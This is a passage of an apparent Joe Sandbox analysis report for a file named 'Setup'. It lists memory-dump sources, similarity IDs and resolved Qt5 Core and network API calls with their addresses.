                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ?lock@Locker@@MutexMutex@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2791775482-0
                                                                                                                                                              APIs
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,00007FFBA1A2836E,?,?,00000018,00007FFBA1A2A275,?,?,?,00007FFBA1A2C553,?,?,00000000), ref: 00007FFBA1A282BA
                                                                                                                                                              • ??1QVariant@@QEAA@XZ.QT5CORE(?,?,?,?,00007FFBA1A2836E,?,?,00000018,00007FFBA1A2A275,?,?,?,00007FFBA1A2C553,?,?,00000000), ref: 00007FFBA1A282C4
                                                                                                                                                              • ?freeTree@QMapDataBase@@QEAAXPEAUQMapNodeBase@@H@Z.QT5CORE(?,?,?,?,00007FFBA1A2836E,?,?,00000018,00007FFBA1A2A275,?,?,?,00007FFBA1A2C553,?,?,00000000), ref: 00007FFBA1A282F3
                                                                                                                                                              • ?freeData@QMapDataBase@@SAXPEAU1@@Z.QT5CORE(?,?,?,?,00007FFBA1A2836E,?,?,00000018,00007FFBA1A2A275,?,?,?,00007FFBA1A2C553,?,?,00000000), ref: 00007FFBA1A282FC
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
• Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Base@@$?freeData$Array@@ByteData@NodeTree@U1@@Variant@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 537957619-0
                                                                                                                                                              APIs
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,00007FFBA1A20C5F,?,?,?,00007FFBA1A1EC65,?,?,?,?,00007FFBA1A221CC), ref: 00007FFBA1A1ECCA
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,00007FFBA1A20C5F,?,?,?,00007FFBA1A1EC65,?,?,?,?,00007FFBA1A221CC), ref: 00007FFBA1A1ECD4
                                                                                                                                                              • ?freeTree@QMapDataBase@@QEAAXPEAUQMapNodeBase@@H@Z.QT5CORE(?,?,?,?,00007FFBA1A20C5F,?,?,?,00007FFBA1A1EC65,?,?,?,?,00007FFBA1A221CC), ref: 00007FFBA1A1ED03
                                                                                                                                                              • ?freeData@QMapDataBase@@SAXPEAU1@@Z.QT5CORE(?,?,?,?,00007FFBA1A20C5F,?,?,?,00007FFBA1A1EC65,?,?,?,?,00007FFBA1A221CC), ref: 00007FFBA1A1ED0C
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Base@@$?freeData$Array@@ByteData@NodeString@@Tree@U1@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1897305905-0
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?end@$?begin@?compare@Array@@ByteCaseQt@@@Sensitivity@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 85410061-0
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Url@@$Mutex@@V0@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 858016824-0
                                                                                                                                                              APIs
                                                                                                                                                              • ?isValid@QDateTime@@QEBA_NXZ.QT5CORE(?,?,00000000,00007FFBA19A1740), ref: 00007FFBA199445A
                                                                                                                                                              • ?currentDateTimeUtc@QDateTime@@SA?AV1@XZ.QT5CORE(?,?,00000000,00007FFBA19A1740), ref: 00007FFBA1994470
                                                                                                                                                              • ??MQDateTime@@QEBA_NAEBV0@@Z.QT5CORE(?,?,00000000,00007FFBA19A1740), ref: 00007FFBA1994481
                                                                                                                                                              • ??1QDateTime@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA19A1740), ref: 00007FFBA199449C
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Date$Time@@$?currentTimeUtc@V0@@Valid@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2771487965-0
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA1A55CBC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBA19730E8), ref: 00007FFBA1A55CD6
                                                                                                                                                              • ??0QThread@@QEAA@PEAVQObject@@@Z.QT5CORE(?,?,00000000,00007FFBA19D4F4C), ref: 00007FFBA1977447
                                                                                                                                                                • Part of subcall function 00007FFBA1973DD0: ??0QByteArray@@QEAA@UQByteArrayDataPtr@@@Z.QT5CORE ref: 00007FFBA1973E06
                                                                                                                                                              • ?setObjectName@QObject@@QEAAXAEBVQString@@@Z.QT5CORE ref: 00007FFBA1977475
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1977480
                                                                                                                                                              • ?start@QThread@@QEAAXW4Priority@1@@Z.QT5CORE ref: 00007FFBA197748F
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteThread@@$?set?start@ArrayArray@@DataName@ObjectObject@@Object@@@Priority@1@@Ptr@@@String@@String@@@malloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3444596378-0
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ?lock@Array@@ByteLocker@@MutexMutex@@String@@V0@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1807476591-0
                                                                                                                                                              APIs
                                                                                                                                                              • ??1QDateTime@@QEAA@XZ.QT5CORE(?,?,FFFFFFFF,00007FFBA1A22202,?,?,000000E8,00007FFBA198468C,?,?,00000000,00007FFBA198413E), ref: 00007FFBA1A1F571
                                                                                                                                                              • ??1QDateTime@@QEAA@XZ.QT5CORE(?,?,FFFFFFFF,00007FFBA1A22202,?,?,000000E8,00007FFBA198468C,?,?,00000000,00007FFBA198413E), ref: 00007FFBA1A1F57B
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,FFFFFFFF,00007FFBA1A22202,?,?,000000E8,00007FFBA198468C,?,?,00000000,00007FFBA198413E), ref: 00007FFBA1A1F597
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,FFFFFFFF,00007FFBA1A22202,?,?,000000E8,00007FFBA198468C,?,?,00000000,00007FFBA198413E), ref: 00007FFBA1A1F5A1
                                                                                                                                                                • Part of subcall function 00007FFBA1A364D0: ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A20C42,?,?,?,00007FFBA1A1EC65), ref: 00007FFBA1A364E8
                                                                                                                                                                • Part of subcall function 00007FFBA1A364D0: ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A20C42,?,?,?,00007FFBA1A1EC65), ref: 00007FFBA1A3650D
                                                                                                                                                                • Part of subcall function 00007FFBA1A364D0: ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A20C42,?,?,?,00007FFBA1A1EC65), ref: 00007FFBA1A36524
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@ByteDateLogger@@MessageTime@@$?warning@Category@@Enabled@H00@LoggingWarning
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1974625209-0
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DateTime@@$BasicMutex@@Timer@@malloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1432639436-0
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@ByteString@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2517040404-0
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@ByteString@@V0@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1086182875-0
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA1A281A0: ??0QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1A28223
                                                                                                                                                                • Part of subcall function 00007FFBA1A281A0: ?sharedNull@QArrayData@@SAPEAU1@XZ.QT5CORE ref: 00007FFBA1A28245
                                                                                                                                                              • ?sharedNull@QArrayData@@SAPEAU1@XZ.QT5CORE(?,?,00000000,00007FFBA1A28162), ref: 00007FFBA1A410E4
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1A410FF
                                                                                                                                                              • ?sharedNull@QArrayData@@SAPEAU1@XZ.QT5CORE ref: 00007FFBA1A41105
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1A41119
                                                                                                                                                                • Part of subcall function 00007FFBA1A43750: ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFBA1A43864
                                                                                                                                                                • Part of subcall function 00007FFBA1A43750: ??1QMutexLocker@@QEAA@XZ.QT5CORE ref: 00007FFBA1A43880
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@$?sharedArrayNull@String@@$?dispose@Data@1@@ListLocker@@Mutex
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1678669062-0
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1A1EACA,?,?,?,00007FFBA1971752), ref: 00007FFBA1A1EBC0
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1A1EACA,?,?,?,00007FFBA1971752), ref: 00007FFBA1A1EBCA
                                                                                                                                                              • ??0QDateTime@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1A1EACA,?,?,?,00007FFBA1971752), ref: 00007FFBA1A1EBEA
                                                                                                                                                              • ??0QDateTime@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1A1EACA,?,?,?,00007FFBA1971752), ref: 00007FFBA1A1EBF4
                                                                                                                                                                • Part of subcall function 00007FFBA1A43750: ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFBA1A43864
                                                                                                                                                                • Part of subcall function 00007FFBA1A43750: ??1QMutexLocker@@QEAA@XZ.QT5CORE ref: 00007FFBA1A43880
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DateString@@Time@@$?dispose@Data@1@@Data@@ListLocker@@Mutex
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 246617890-0
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1973FB2
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1973FC0
                                                                                                                                                                • Part of subcall function 00007FFBA19802D0: ??0QBasicTimer@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1973FD4), ref: 00007FFBA19802FE
                                                                                                                                                                • Part of subcall function 00007FFBA19802D0: ??0QDateTime@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1973FD4), ref: 00007FFBA1980308
                                                                                                                                                                • Part of subcall function 00007FFBA19802D0: ??0QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1973FD4), ref: 00007FFBA1980312
                                                                                                                                                                • Part of subcall function 00007FFBA19802D0: ??0QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1973FD4), ref: 00007FFBA198031C
                                                                                                                                                                • Part of subcall function 00007FFBA19802D0: ??0QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1973FD4), ref: 00007FFBA1980326
                                                                                                                                                                • Part of subcall function 00007FFBA19802D0: ??0QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1973FD4), ref: 00007FFBA1980330
                                                                                                                                                                • Part of subcall function 00007FFBA19802D0: ??0QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1973FD4), ref: 00007FFBA198033A
                                                                                                                                                                • Part of subcall function 00007FFBA19802D0: ??4QByteArray@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FFBA198036B
                                                                                                                                                                • Part of subcall function 00007FFBA19802D0: ??4QByteArray@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FFBA1980380
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA1973FD9
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA1973FE4
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Array@@Byte$V0@@$BasicDateTime@@Timer@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 694399551-0
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Byte$ArrayArray@@DataInit_thread_footerPtr@@@
                                                                                                                                                              • String ID: Y-----
                                                                                                                                                              • API String ID: 4174580304-2754263011
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Byte$ArrayArray@@DataInit_thread_footerPtr@@@
                                                                                                                                                              • String ID: ----
                                                                                                                                                              • API String ID: 4174580304-645692374
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Byte$ArrayArray@@DataInit_thread_footerPtr@@@
                                                                                                                                                              • String ID: -----
                                                                                                                                                              • API String ID: 4174580304-4165711970
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Byte$ArrayArray@@DataInit_thread_footerPtr@@@
                                                                                                                                                              • String ID: ---
                                                                                                                                                              • API String ID: 4174580304-2854292027
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,?,00007FFBA1A36395,?,?,?,?,?,?,?,?,?,?,00007FFBA1A3C7A1), ref: 00007FFBA1A1EA4C
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA1A1EA65
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Init_thread_footerLogging
                                                                                                                                                              • String ID: qt.network.ssl
                                                                                                                                                              • API String ID: 189896515-2426049154
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,0147AE14,00007FFBA19D9E67,?,?,?,?,?,?,?,?,00000000,00007FFBA198414C), ref: 00007FFBA19A9B1C
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA19A9B35
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Init_thread_footerLogging
                                                                                                                                                              • String ID: qt.network.http2
                                                                                                                                                              • API String ID: 189896515-693620304
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,00000000,00007FFBA19FF3B2,?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA1A005BC
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA1A005D5
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Category@@Init_thread_footerLogging
                                                                                                                                                              • String ID: qt.network.monitor
                                                                                                                                                              • API String ID: 189896515-2477741448